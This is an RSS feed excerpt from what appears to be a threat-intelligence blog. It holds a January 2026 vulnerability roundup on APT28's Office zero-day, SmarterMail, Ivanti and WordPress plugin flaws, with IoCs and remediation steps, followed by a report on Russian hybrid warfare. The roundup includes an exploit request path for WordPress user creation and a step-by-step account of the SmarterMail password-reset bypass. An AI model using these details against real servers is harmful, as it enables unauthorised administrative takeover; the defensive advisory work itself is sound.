        <p><strong>APT28's Operation Neusploit marked January's most sophisticated campaign:</strong></p>
        <ul>
          <li>Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files</li>
          <li>Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses</li>
          <li>Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant</li>
          <li>Abused the Filen API as a C2 bridge between the implant and an actor-controlled Covenant listener</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2026-21509 | Microsoft Office</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by APT28</p>
        <p><strong>Why this matters:</strong> Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.</p>
        <p><strong>Affected versions:</strong> Microsoft 365 and Microsoft Office (versions not specified in advisory)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install Microsoft's out-of-band update released January 26, 2026</li>
          <li>Search email systems for RTF attachments with embedded malicious droppers</li>
          <li>Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM</li>
          <li>Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot</li>
          <li>Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints</li>
          <li>Hunt for scheduled tasks named "OneDriveHealth" and for the suspicious file %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png</li>
          <li>Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d8e4dc50a83f9e11b1c9b0b7e1e5476bd9fb3016.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="779" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong> <a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a> Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2026-23760 | SmarterTools SmarterMail</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added January 26, 2026</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.</p>
        <p><strong>Affected versions:</strong> SmarterTools SmarterMail prior to build 9511</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade to build 9511 or later immediately</li>
          <li>Review administrator account activity logs for unauthorized password resets</li>
          <li>Check the Volume Mounts configuration for suspicious command entries</li>
          <li>Review administrator access patterns and session logs</li>
          <li>Audit system for unauthorized changes made with compromised admin access</li>
        </ul>
        <h3>CVE-2026-1281 &amp; CVE-2026-1340 | Ivanti Endpoint Manager Mobile</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: CVE-2026-1281 added January 29, 2026</p>
        <p><strong>Why this matters:</strong> Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.</p>
        <p><strong>Affected versions:</strong> Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm</li>
          <li>Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)</li>
          <li>Monitor for unusual Apache RewriteMap activity</li>
          <li>Review logs for crafted HTTP parameters to app store retrieval routes</li>
          <li>Check for unauthorized code execution attempts via RewriteRule handling</li>
        </ul>
        <p><strong>Exposure:</strong> EPMM instances accessible over corporate networks or VPN connections</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13dd09f2863edb79f18c40c52cdf0379e47eecaf5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong> Risk Rules History from <a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a> Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Technical Deep Dive: Exploitation Analysis</h2>
        <h3>APT28's Operation Neusploit (CVE-2026-21509)</h3>
        <p><strong>The multi-stage attack chain:</strong> CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:</p>
        <ul>
          <li><strong>Initial delivery –</strong> Specially crafted RTF file exploits CVE-2026-21509</li>
          <li><strong>Server-side evasion –</strong> Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent</li>
          <li><strong>Dropper variants –</strong> Two distinct infection paths deployed based on targeting:
            <ul>
              <li><strong>Variant 1 (MiniDoor):</strong> Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses</li>
              <li><strong>Variant 2 (PixyNetLoader):</strong> Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking</li>
            </ul>
          </li>
        </ul>
        <p><strong>Why this matters:</strong> APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.</p>
        <h3>Modular DS WordPress Plugin Exploitation (CVE-2026-23550 &amp; CVE-2026-23800)</h3>
        <p><strong>The authentication bypass chain:</strong> CVE-2026-23550 enables administrator-level access without authentication:</p>
        <ul>
          <li>Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification</li>
          <li>/api/modular-connector/login flow grants access based on site connector enrollment state</li>
          <li>If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session</li>
          <li>CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&amp;origin=mo&amp;type=x</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23550:</strong></p>
        <ul>
          <li>45[.]11[.]89[.]19</li>
          <li>185[.]196[.]0[.]11</li>
          <li>64[.]188[.]91[.]37</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23800:</strong></p>
        <ul>
          <li>62[.]60[.]131[.]161</li>
          <li>185[.]102[.]115[.]27</li>
          <li>backup[@]wordpress[.]com</li>
          <li>backup1[@]wordpress[.]com</li>
        </ul>
        <p><strong>Why this matters:</strong> WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.</p>
        <h3>SmarterMail Authentication Bypass (CVE-2026-23760)</h3>
        <p><strong>The password reset flaw:</strong> CVE-2026-23760 exposes privileged password reset to anonymous callers:</p>
        <ul>
          <li>ForceResetPassword controller attribute explicitly permits unauthenticated access</li>
          <li>Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context</li>
          <li>System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword</li>
          <li>Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls</li>
        </ul>
        <p><strong>Why this matters:</strong> Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.</p>
        <h2>Detection &amp; Remediation Resources</h2>
        <h3>Nuclei Templates from Insikt Group®</h3>
        <p>Recorded Future customers can access Nuclei templates for:</p>
        <ul>
          <li><strong>CVE-2025-8110 (Gogs)</strong> – Version detection and fingerprinting check</li>
          <li><strong>CVE-2026-23760 (SmarterMail)</strong> – Authentication bypass validation</li>
        </ul>
        <h3>Recorded Future Product Integrations</h3>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize based on active exploitation data, including APT28 targeting</li>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets</li>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Monitor vendor vulnerabilities across your supply chain</li>
        </ul>
        <h2>January 2026 Summary</h2>
        <p><strong>State-sponsored zero-days return.</strong> APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.</p>
        <p><strong>Authentication bypass dominates enterprise risk.</strong> Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.</p>
        <p><strong>Legacy vulnerabilities persist.</strong> CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.</p>
        <h2>Take Action</h2>
        <p>Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our <a href="https://www.recordedfuture.com/ko/demo">demo center</a> for live examples, or dive deeper with <a href="https://www.recordedfuture.com/ko/research">Insikt Group research</a> for technical threat intelligence.</p>
        <p><strong>About Insikt Group®:</strong></p>
        <p>Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Preparing for Russia’s New Generation Warfare in Europe]]></title>
            <link>https://www.recordedfuture.com/ko/research/preparing-for-russias-new-generation-warfare-in-europe</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/preparing-for-russias-new-generation-warfare-in-europe</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Russia is escalating its hybrid warfare against NATO into a coordinated, full-scale campaign blending cyber attacks, sabotage, and influence operations. Read the full report to understand what New Generation Warfare means for your organization.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Since its full-scale invasion of Ukraine in February 2022, Russia has waged what we assess is largely opportunistic, though increasingly aggressive, hybrid warfare in NATO territory. Moscow has very likely not yet leveraged its full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Over the next two years, Russian President Vladimir Putin will likely escalate Russia’s hybrid warfare campaign against NATO members into a full-fledged campaign likely consistent with a Russian military doctrine called New Generation Warfare (NGW). Putin will likely use this campaign to degrade NATO political unity and defense capabilities, reinforce Russia’s network of overt and covert assets across NATO, and optimize the physical and political environment, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>In a full-scale NGW campaign in NATO territory, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is more intentionally planned and aims to project Russian power and weaken European defenses on a systemic level. An NGW campaign would very likely involve Russia using the same tactics it is currently using, including sabotage operations, influence operations, territorial waters and airspace violations, and exploitation of some NATO states’ dependence on Russian oil and gas. The primary differences between Russia’s current operations in Europe and an NGW campaign would include greater geographic breadth of those operations; greater frequency of operations; and Russia likely using tactics simultaneously and in coordinated ways. For example, likely Russia-directed threat actors might use a drone to violate the airspace over a NATO state’s airport, forcing the temporary closure of that airport, coupled with a distributed denial-of-service attack on the airport’s internal communications system. Russia might then post a video of the incidents through one of its overt or covert propaganda outlets, arguing that they show NATO cannot adequately protect its aviation network.</p>
        <p>An NGW campaign in NATO territory would very likely have significant implications for private and public sector entities, including degradation of critical infrastructure, reputational risk for individuals and companies named in Russian influence operation campaigns, and reduced public confidence in the government’s ability to ensure their safety.</p>
        <p>Over the next three to five years, Putin will likely evaluate the feasibility of moving from an NGW-like campaign in Europe to a kinetic military incursion. Factors Putin would likely weigh when making such a decision include NATO military capabilities, the likelihood that the US would defend a NATO state if it were attacked, and Russian military capabilities. However, even if the necessary conditions for such an operation emerge, the probability of a proactive Russian military operation into NATO territory very likely remains low.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Russia’s hybrid warfare campaign in NATO territory between February 2022 and January 2026 has been increasingly aggressive, but likely opportunistic and not reflective of Russia’s full cyber, influence operations, and sabotage capabilities.</li>
          <li>Putin likely views the next two years as an opportunity to test NATO’s defensive capabilities and prepare the physical and psychological environment, should he decide to launch a military incursion. Putin likely assesses that the 2028 US presidential election could lead to a US president more willing to commit US resources to NATO. As such, Putin likely views the next two years as an opportunity to exploit existing US-NATO tensions to weaken NATO’s unity and ability to defend itself.</li>
          <li>Russia’s escalated aggression against NATO over the next two years is likely to have the hallmarks of a Russian military doctrine called New Generation Warfare (NGW), which combines sabotage operations, cyberattacks, influence operations, and other non-military actions to undermine the enemy’s confidence and prepare the physical and psychological environment, should Russia elect to escalate into a kinetic military campaign.</li>
          <li>A full-scale NGW campaign would likely involve an intensified campaign of tactics Russia has used against NATO in the last few years, including sabotage operations, influence operations, violations of NATO airspace with drones and jets, violations of NATO states’ territorial waters, targeting of undersea cables, and exploitation of some NATO states’ dependence on Russian gas and oil. Russia would likely deploy these tactics more frequently, across more states simultaneously, and would likely use tactics simultaneously in an attempt to strain NATO resources.</li>
          <li>A full-scale NGW campaign would have significant implications for private and public sector entities operating in NATO territory, including disruption to critical services, reputational risk for individuals and firms named in influence campaigns, supply chain disruptions, and reduced public trust in the government’s ability to safeguard critical infrastructure. The fact that most of the critical infrastructure in NATO territory is privately owned means public-private partnerships will be essential in mitigating the impact of escalated Russian aggression.</li>
        </ul>
        <h2>Russia Likely to Escalate into New Generation Warfare Campaign in Europe Over Next Two Years</h2>
        <p>Since Russia’s full-scale invasion of Ukraine in February 2022, it has waged what Insikt Group assesses is largely opportunistic, though increasingly aggressive, hybrid warfare in Europe. These actions, though destructive, have very likely not leveraged Russia’s full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Nonetheless, Russian president Vladimir Putin very likely still prioritizes weakening European unity and defensive capabilities in service to his overarching foreign policy goal of <a href="https://mid.ru/en/foreign_policy/fundamental_documents/1860586/">replacing</a> the US-led international system with a multipolar world in which Russia, the US, and China are relatively equal in terms of geopolitical influence. Putin very likely judges that <a href="https://www.whitehouse.gov/wp-content/uploads/2025/12/2025-National-Security-Strategy.pdf">uneven</a> US assistance to European defensive efforts creates a window of opportunity for Russia to weaken Europe’s ability to resist Russian aggression. Putin likely views recent US-NATO tensions, such as the US’s articulated <a href="https://time.com/7354005/trump-davos-speech-greenland/">intention</a> to control Greenland, as an opportunity to exacerbate the strategic distance between the US and NATO, thereby weakening the transatlantic partnership that has formed the core of the US-led, post-World War II security architecture. Putin also likely views the next two years as an opportunity to optimize the physical and informational environment in Europe, should he decide to launch a kinetic military attack against Europe.</p>
        <p>Putin very likely views this window of opportunity as finite. He likely recognizes that the 2028 US presidential election could result in a US president more willing to commit US military and political resources to amplifying Europe’s defensive capabilities. As such, over the next two years, Putin will likely escalate Russia’s hybrid warfare against Europe into an expanded campaign that is likely consistent with the principles of Russian New Generation Warfare (NGW) –– a warfare doctrine <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">espoused</a> by senior Russian military officials emphasizing control of the information and psychological spaces, as well as the use of undeclared special forces, to weaken an enemy prior to using traditional military forces.</p>
        <p>Europe’s efforts to bolster its defenses against current levels of Russian hybrid warfare likely reinforce Putin’s perception that Europe is motivated to weaken Russia, thereby likely making him more motivated to target Europe. Putin’s perception that Europe’s defensive efforts are actually a threat to Russia is likely rooted in his calculus that NATO is fundamentally an anti-Russia bloc. Putin has substantiated this assessment by pointing to actions such as NATO’s expansion to include former Warsaw Pact countries and its decision to install missile defense systems in Poland.<sup>1</sup></p>
        <h2>New Generation Warfare Origins and Principles</h2>
        <p>Insikt Group assesses that many of Russia’s aggressive foreign policy actions since the annexation of Crimea in March 2014 –– which marked the beginning of Putin’s more assertive efforts to push back against perceived Western efforts to weaken Russia –– have been consistent with NGW, a Russian doctrine in which the state aims to bring about political change in another country primarily by using overt and covert influence tools, as opposed to conventional military force. These tools can include influence operations, sabotage operations, and exploiting economic leverage.</p>
        <p>New Generation Warfare is typically associated with Chief of the General Staff Valery Gerasimov’s 2013 <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">article</a> in the Russian journal <em>Military-Industrial Kurier</em>, though NGW is essentially a modern version of Soviet active measures. “Active measures” (<em>aktivnye meropriyatiya</em>) was a term <a href="https://www.marshallcenter.org/en/publications/security-insights/active-measures-russias-covert-geopolitical-operations-0">used</a> by the Soviet Union from the 1950s onwards to describe covert influence and subversion operations, including establishing front organizations, backing pro-Soviet political movements abroad, and attempting to orchestrate regime change in foreign countries. Active measures declined during the 1980s and 1990s, but Putin revived its use in the early 2000s. Indeed, in 2007, retired major-general Alexander Vladimirov alluded to that revival when he stated that “modern wars are waged on the level of consciousness and ideas” and that “modern humanity exists in a state of permanent war” in which it is “eternally oscillating between phases of actual armed struggle and constant preparation for it.”<sup>2</sup></p>
        <p>Despite the long history of Russia using active measures, Gerasimov’s 2013 article provides the most comprehensive account of how current Russian military leaders likely view this doctrine. Gerasimov’s article suggests that he views NGW both as the reality of modern warfare and as a preferred way of weakening enemies. Gerasimov argued that the Arab Spring demonstrated that modern wars are no longer declared conflicts fought solely between traditional militaries, but instead depend on combining declared military force with tactics such as domination of the information space, targeting of critical enemy facilities, “asymmetric and indirect operations,” and the use of unofficial special forces. He argued that “the very ‘rules of war’ have changed. The role of nonmilitary means of achieving political and strategic goals has grown and, in many cases, they have exceeded the power of force of weapons in their effectiveness.”</p>
        <p>The following table, taken from a translation of the article, shows Gerasimov’s view of traditional warfare as opposed to New Generation Warfare:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a2e8f66cd46382f09a2845436e016ce2d9e46822.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="852" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong> New Generation Warfare and traditional warfare forms and methods (Source: <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">Military Review</a>)</em></div>
          </div>
        </div>
        <p>We assess that Russia’s campaign in Ukraine, starting with the annexation of Crimea in March 2014 and extending to its ongoing full-scale military operation, bears many of the hallmarks of NGW. Russia’s military operations more closely aligned with NGW principles from 2014 through 2021; after Russia’s full-scale invasion of Ukraine in February 2022, the Russian military transitioned to more traditional operations. Russia’s exploitation of influence operations and asymmetric warfare has been a feature of its operations since 2014, and since 2022, Russia has <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">expanded</a> asymmetric and sabotage operations in Europe likely as part of a multi-faceted strategy to use power exertion in Ukraine and Europe to weaken the Western geopolitical system.</p>
        <p>This does not mean that Russian military leadership have consciously used NGW as their guiding principle in Ukraine at all times; indeed, we lack the insight into Russian military leadership thinking to assess with high confidence the principles they are employing. Rather, the combination of Gerasimov’s writings and observation of Russian operations in Ukraine means we can assess with medium confidence that Russia’s Ukraine operations prior to 2022 often reflected NGW principles. As such, we assess that NGW is a useful framework for understanding Russian military operations.</p>
        <div>
          <div>
            <div><strong>NGW Principle</strong></div>
            <div><strong>Example of How the Ukraine Operation Exemplifies Principle</strong></div>
          </div>
          <div>
            <div>Initiation of military operations by groupings of line units in peacetime</div>
            <div><strong>March 2014–February 2022:</strong> Russian regular line units (Russian Airborne Forces [VDV], Naval Infantry, and Main Intelligence Directorate [GRU]-controlled <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">unit</a> formations) entered Ukrainian territory, <a href="https://digitallibrary.un.org/record/767883">annexed</a> Crimea, and <a href="https://www.osce.org/sites/default/files/f/documents/5/d/196991.pdf">operated</a> in eastern Ukraine without a declared state of war. In eastern Ukraine, troops operated under attempted deniability, with Moscow claiming the operations were being <a href="https://www.osce.org/sites/default/files/f/documents/1/f/146341.pdf">conducted</a> by sympathetic Ukrainian separatist forces.<br /><br /><strong>February 2022–January 2026:</strong> Though Russia acknowledged its presence throughout Ukraine, it still operates<sup>3</sup> without a full declaration of war, instead casting its campaign as a “special military operation.”</div>
          </div>
          <div>
            <div>Highly maneuverable, noncontact combat operations of interbranch groupings of line units</div>
            <div><strong>March 2014–February 2022:</strong> Russian battalion tactical groups (BTGs) generally <a href="https://www.rusi.org/explore-our-research/publications/commentary/getting-know-russian-battalion-tactical-group">demonstrated</a> high operational mobility, integrating ground forces, artillery, electronic warfare, and intelligence, surveillance, and reconnaissance (ISR) assets.<br /><br /><strong>February 2022–January 2026:</strong> As Russia has attempted to take more territory, it has <a href="https://www.rusi.org/explore-our-research/publications/commentary/attritional-art-war-lessons-russian-war-ukraine">transitioned</a> to a greater emphasis on attritional, contact-heavy warfare.</div>
          </div>
          <div>
            <div>Reduction of the military-economic potential of the enemy state via the destruction of critically important military and civilian infrastructure</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently <a href="https://ukraine.ohchr.org/en/Increasing-attacks-on-Ukraine-s-energy-infrastructure-place-civilians-at-risk-UN-human-rights-monitors-warn">attempted</a> to degrade Ukraine’s critical infrastructure, including through long-range strikes and cyberattacks <a href="https://www.cisa.gov/news-events/ics-alerts/ir-alert-h-16-056-01">targeting</a> power plants, transportation and logistics hubs, and defense-industrial facilities.</div>
          </div>
          <div>
            <div>Mass use of precision weaponry, special operations forces, and robotics systems</div>
            <div><strong>March 2014–January 2026:</strong> Russia has increasingly <a href="https://en.defence-ua.com">used</a> precision weapons (for example, Iskander-M ballistic missiles, Kalibr cruise missiles, Kh-101/555 air-launched cruise missiles), GRU special operations <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">units</a> (including the 3rd Separate Spetsnaz Brigade and the 346th Independent Spetsnaz Brigade), and <a href="https://www.dia.mil/Portals/110/Documents/News/Military_Power_Publications/UAV_Book.pdf">unmanned</a> systems (such as Orlan-10, Lancet, and Shahed-136 drones, and ground robots for logistics and mine-clearing operations).</div>
          </div>
          <div>
            <div>Simultaneous effects on line-units and enemy facilities throughout the enemy state’s territory</div>
            <div><strong>March 2014–January 2026:</strong> Russia has <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a">conducted</a> strikes across Ukraine, using frontline units, operational rear units, missile and ground attacks, and cyber operations.</div>
          </div>
          <div>
            <div>Warfare simultaneously in physical and information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently used covert and overt means to <a href="https://stratcomcoe.org/publications/analysis-of-russias-information-campaign-against-ukraine/151">propagate</a> narratives meant to justify intervention and regime change in Ukraine. These include <a href="https://www.euvsdisinfo.eu/report/ukraine-promotes-nazism-because-it-oppresses-russians/">allegations</a> of Nazism in the Ukrainian military and government writ large; discrimination against Russians in Ukraine; and Western government efforts to foment revolution in Ukraine.</div>
          </div>
          <div>
            <div>Use of asymmetric and indirect operations</div>
            <div>
              <p><strong>March 2014–February 2022:</strong> Russia’s operations were indirect because they <a href="https://www.congress.gov/crs_external_products/IF/PDF/IF12344/IF12344.3.pdf">included</a> non-acknowledged units, private military companies, and proxy forces such as Donetsk People’s Republic (DPR) and Luhansk People’s Republic (LPR) militias.</p>
              <p><strong>February 2022–January 2026:</strong> Russia escalated its use of asymmetric and indirect operations against Europe, including <a href="https://www.gov.uk/government/news/joint-expeditionary-force-activates-uk-led-reaction-system-to-track-threats-to-undersea-infrastructure-and-monitor-russian-shadow-fleet">targeting</a> undersea cables and critical infrastructure, likely to pressure Europe and Kyiv to abandon efforts to resist Russia’s Ukraine campaign.</p>
            </div>
          </div>
          <div>
            <div>Command and control of forces and assets in a unified information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has attempted to <a href="https://www.usmcu.edu/Outreach/Marine-Corps-University-Press/MCU-Journal/JAMS-vol-14-no-2/Russias-War-in-Ukraine/">integrate</a> its C2 structures, including shared ISR, targeting data, and operational planning, across services, and has centralized strike coordination for long-range fires.<br /><br />However, limitations have been <a href="https://www.congress.gov/crs_external_products/R/PDF/R47068/R47068.1.pdf">apparent</a> in Russia’s ability to accomplish this, especially since February 2022, likely stemming from deficiencies such as poor inter-service coordination, rigid command structures, and underestimation of Ukrainian capabilities and willingness to fight.</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong> New Generation Warfare principles (Source: Recorded Future)</em></p>
        <h2>New Generation Warfare Toolkit</h2>
        <p>In a full-scale New Generation Warfare campaign in Europe, Russia would likely move from its current pattern of influence operations combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is both proactive and reactive. It would likely involve the same tactics Russia has used against NATO states for the past few years. The difference would likely be that Russia would deploy these tactics more frequently and across a greater number of states at once. A full NGW campaign would likely also involve using some operational methods simultaneously and in ways that amplify one another.</p>
        <p>Even in a full-scale NGW campaign, Russia would very likely aim to keep destruction below the threshold that risks NATO invoking Article 5. NATO officials have not specified precisely what the Article 5 threshold is; indeed, former NATO Secretary General Jens Stoltenberg <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">stated</a> that the grounds for invoking Article 5 “must remain purposefully vague.” However, it is likely that it would include a mass casualty event or the use of a chemical or biological weapon. The text of Article 5 <a href="https://www.nato.int/en/what-we-do/introduction-to-nato/collective-defence-and-article-5">specifies</a> that the threshold involves “an armed attack.” NATO officials <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">said</a> in 2022 that a cyberattack could constitute grounds for invoking Article 5, though they did not specify what kind of cyberattack would qualify.</p>
        <p>Russia is likely to face few downsides during an NGW campaign, due to minimal risk of Russian casualties and the campaign’s tactical flexibility. Unlike a conventional military campaign, which risks a high level of casualties that can cause domestic public dissatisfaction, an NGW campaign very likely would involve minimal risk to Russian citizens. In addition, an NGW campaign inherently offers significant tactical flexibility, as it is not a declared campaign in which Russia needs to articulate goals to justify the campaign to the Russian public and elites. As such, Putin would likely have the option to draw down tactics that are proving less effective and increase the use of more effective tactics, without needing to justify tactical failures. This flexibility would likely allow Putin to continue at least aspects of an NGW campaign in the likely event that Europe responds to an NGW campaign with escalated efforts to counter Moscow.</p>
        <h3>Influence Operations and Propaganda</h3>
        <p>Russian “active measures” serve as a force multiplier for Moscow’s broader political warfare, integrating influence operations, propaganda, and sabotage. In Europe, these efforts aim to weaken transatlantic cohesion, erode public and political support for Ukrainian sovereignty and assistance to Kyiv, and exacerbate internal societal divisions, economic uncertainty, and other challenges. By cultivating sanctions fatigue and encouraging selective bilateral re-engagement with Russia through active measures, Moscow seeks to mitigate its international isolation and <a href="https://www.cnas.org/publications/commentary/russia-wants-a-new-world-order">undermine</a> the rules-based international order, thereby advancing a Russia-favored multipolar system <a href="https://www.csis.org/blogs/post-soviet-post/four-myths-about-russian-grand-strategy">characterized</a> by exclusive spheres of influence. Notably, these activities also include angles of domestic preservation by portraying the West as chaotic, corrupt, and immoral, and thereby discouraging the expansion of liberal democracies elsewhere, particularly from within.</p>
        <p>Since Russia’s full-scale invasion of Ukraine in 2022, Insikt Group has observed concentrated Russian influence operations targeting the domestic audiences of what Moscow likely views as Kyiv’s core European supporters: the UK, France, Germany, and Poland. Insikt Group investigations, in addition to public reporting, have previously identified multiple influence operations targeting the above-mentioned major European allies, including Doppelgänger, Operation Overload, Operation Undercut, and CopyCop. These influence operations have commonly impersonated national and pan-European media outlets to disseminate messages aligned with Kremlin propaganda, including anti-Ukraine themes and content that denigrates pro-European political figures. Elsewhere, Russian influence operations have sought to use fear and physical demonstrations to manipulate public opinion. In France, for example, Russia-linked physical intimidation very likely intended to provoke public anxiety and societal unrest <a href="https://www.bbc.com/news/world-europe-67360768">included</a> the Star of David and red hand graffiti, as well as the <a href="https://www.lemonde.fr/en/pixels/article/2024/06/03/coffins-at-the-eiffel-tower-suspicions-point-to-another-case-of-russian-interference_6673608_13.html">placement</a> of caskets near the Eiffel Tower ahead of the 2024 Paris Olympic Games. Similar efforts have also appeared elsewhere in Europe, including the <a href="https://edition.cnn.com/2024/09/13/europe/pro-russian-posters-italy-intl-scli">emergence</a> of pro-Russian billboards in Italy and the "Children of War, Alley of Angels" <a href="https://eaworldview.com/2025/02/ukraine-war-europe-facing-trump-russia/">exhibit</a> in Germany.</p>
